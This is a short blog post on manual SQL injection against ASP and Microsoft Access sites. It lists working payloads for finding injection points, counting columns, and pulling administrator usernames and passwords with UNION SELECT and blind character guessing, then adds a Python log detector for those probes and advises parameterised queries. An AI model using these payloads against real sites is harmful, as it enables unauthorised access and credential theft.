ASP + ACCESS manual injection vulnerability

Access Database

  1. Introduction

Microsoft Access is a database management system (DBMS) from Microsoft that combines the relational Microsoft Jet Database Engine with a graphical user interface and software-development tools.

Microsoft Access stores data in its own format based on the Access Jet Database Engine. It can also import or link directly to data stored in other applications and databases.

  2. Data structure

tables -> columns -> data

  3. Editors for opening Microsoft Access

DBview, Easy Access

SQL Injection

  1. Process

    • Check whether there is a SQL injection point
    • Guess the table name
    • Guess the column name
    • Guess the administrator's ID
    • Guess the length of username and password
    • Guess username and password
  2. Some query methods

    • Union method
      and 1=1 and 1=2 # determine whether it is an injection point
      order by 22 # guess how many columns the query has
      union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin # guess the table name (an error response means the guess is wrong; otherwise it is right)
      union select 1,2,username,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin # guess the column names
    • Character-by-character guessing
      and 1=1 and 1=2 # check the injection point
      and exists (select * from admin) # Guess the table name
      and exists (select user_name from admin) # Guess the column name
      Confirm the length and the ASCII value of each character:
      and (select top 1 len(user_name) from admin) = 5
      and (select top 1 asc(mid(user_name,1,1)) from admin)=97
      and (select top 1 asc(mid(user_name,2,1)) from admin)=97
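
From the defender's side, each stage of the process above leaves a recognizable trace in the web server's request log. The following is an added example, not part of the original post: a Python detector that maps the probe strings listed here to named stages. The log layout, the paths, the IP addresses and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

# Signatures derived from the probe strings listed in this post.
SIGNATURES = [
    ("boolean-test", re.compile(r"\band\s+1\s*=\s*[12]\b")),
    ("order-by-count", re.compile(r"\border\s+by\s+\d+\b")),
    ("union-select", re.compile(r"\bunion\s+select\b.+\bfrom\b")),
    ("exists-probe", re.compile(r"\bexists\s*\(\s*select\b")),
    ("blind-length", re.compile(r"\bselect\s+top\s+1\s+len\s*\(")),
    ("blind-char", re.compile(r"\basc\s*\(\s*mid\s*\(")),
]

def classify(query_string):
    """Return the names of all signatures matching a raw, URL-encoded query string."""
    # Decode twice so double-encoded input (%2520) is also normalised.
    text = unquote_plus(unquote_plus(query_string)).lower()
    text = re.sub(r"\s+", " ", text)
    return [name for name, rx in SIGNATURES if rx.search(text)]

def scan(log_lines):
    """Map each client IP to the set of probe stages seen in its requests.

    Assumed line layout (constructed, simplified): ip method path query status
    """
    stages = {}
    for line in log_lines:
        fields = line.split()
        if len(fields) != 5:
            continue  # skip malformed lines
        ip, _method, _path, query, _status = fields
        hits = classify(query)
        if hits:
            stages.setdefault(ip, set()).update(hits)
    return stages

# Constructed sample log lines (documentation IP ranges, hypothetical paths).
SAMPLE_LOG = [
    "203.0.113.7 GET /news.asp id=12 200",
    "203.0.113.7 GET /news.asp id=12+and+1=2 200",
    "203.0.113.7 GET /news.asp id=12%2520order%2520by%252022 200",
    "203.0.113.7 GET /news.asp id=12+UNION+SELECT+1,2,3+from+admin 500",
    "203.0.113.7 GET /news.asp id=12+and+exists+(select+*+from+admin) 200",
    "203.0.113.7 GET /news.asp id=12+and+(select+top+1+asc(mid(user_name,1,1))+from+admin)=97 200",
    "198.51.100.4 GET /list.asp sort=order_by_date&page=1 200",
]

if __name__ == "__main__":
    for ip, seen in scan(SAMPLE_LOG).items():
        print(ip, sorted(seen))
```

A client that accumulates several distinct stages in a short window is walking through the enumeration process rather than sending a stray malformed request. Matching like this only flags probing; the fix is to build the ASP query with parameters instead of string concatenation.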
posted @ 2021-01-19 17:40  咕咕鸟GGA